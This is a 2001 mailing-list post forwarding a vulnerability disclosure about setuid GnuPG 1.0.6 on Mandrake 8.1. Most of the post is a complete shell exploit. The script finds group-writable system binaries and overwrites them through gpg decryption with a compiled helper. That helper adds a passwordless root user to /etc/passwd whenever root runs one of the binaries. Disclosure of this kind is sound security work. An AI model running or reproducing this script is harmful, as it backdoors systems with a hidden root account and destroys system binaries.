GnuPG exploit [Fwd: Possible problem with GnuPG 1.0.6]

Renato Martini rmartini@cipsga.org.br
Sun Dec 30 19:30:01 2001


-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160


Hi ALL!

I received this "possible problem" in GnuPG code and its exploit...

Did anybody here read this forwarded message?

thanks

- ---------
  __|_ _| _ \  __|  __|   \    | Renato Martini ::: Diretor Administrativo
 (     |  __/\__ \ (_ |  _ \   | http://www.cipsga.org.br
\___|___|_|  ____/\___|_/  _\  | http://gnupg.unixsecurity.com.br
- -----------------------------------------------------------------------
"O Fantasia, che dei tempi e delle distanze fai il tuo giuoco audace!"
                         (Gabriele d'Annunzio)


- ---------- Forwarded message ----------
Date: Sat, 29 Dec 2001 16:27:39 -0200
From: Renato Murilo Langona <renato@linuxsecurity.com.br>
To: rmartini@cipsga.org.br
Subject: [Fwd: Possible problem with GnuPG 1.0.6]

Przemyslaw Frasunek wrote:
>
> Hello,
>
> I've just found out strange behaviour with GnuPG 1.0.6 installed setuid
> (default on Mandrake, probably others?). When decrypting file, it allows to
> overwrite any group-writeable file in system.
>
> It works for me on Mandrake 8.1, because few system binaries are
> installed group-writeable (especially smbmount and smbumount). Exploit
> attached.
>
> #!/bin/sh
>
> # babcia padlina 2001
> # especially for pcoa :)
> #
> # GnuPG when installed setuid allows overwriting any group-writable
> # files.
> #
> # Tested on generic Mandrake 8.1
>
> if [ ! -x /usr/bin/gpg -o ! -u /usr/bin/gpg ]; then
>   echo "GnuPG not installed or not setuid."
>   exit 1
> fi
>
> if [ ! -x /usr/bin/gcc ]; then
>   echo "gcc not installed."
>   exit 1
> fi
>
> echo "Looking for group-writeable binaries..."
> echo
>
> BINS=`/usr/bin/find /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin -type f -perm -0020 2>/dev/null`
>
> if [ "X$BINS" != "X" ]; then
>   echo "$BINS"
> else
>   echo "Sorry, this system is not exploitable."
>   exit 1
> fi
>
> echo
> echo "Compiling helper binary..."
> echo
>
> cat > own.c << __EOF__
> main() { if (!getuid()) { system("echo \"babunia::0:0::/:/bin/sh\" >> /etc/passwd"); } }
> __EOF__
>
> /usr/bin/gcc -o own own.c > /dev/null 2>&1
>
> if [ ! -x own ]; then
>   echo "Compilation failed."
>   exit 1
> fi
>
> rm -f own.c
>
> echo "Overwriting binaries... Please confirm each one."
> echo
>
> for i in $BINS; do
>   rm -f own.gpg
>   echo owned | gpg --passphrase-fd 0 -c own
>   echo owned | gpg --passphrase-fd 0 -o $i own.gpg
> done
>
> rm -f own own.gpg
>
> echo
> echo "Looks like everything is done. When root will run any of above"
> echo "binaries, user babunia will be added with root privs."
>
> --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8L2uEYogE2yD8bPYRAwp7AJ4pTde+40i4jBV+f8WxXrbJ8SPvAgCgzn3V
7iDkoCVT+jITP23zCHezBqI=
=xaIc
-----END PGP SIGNATURE-----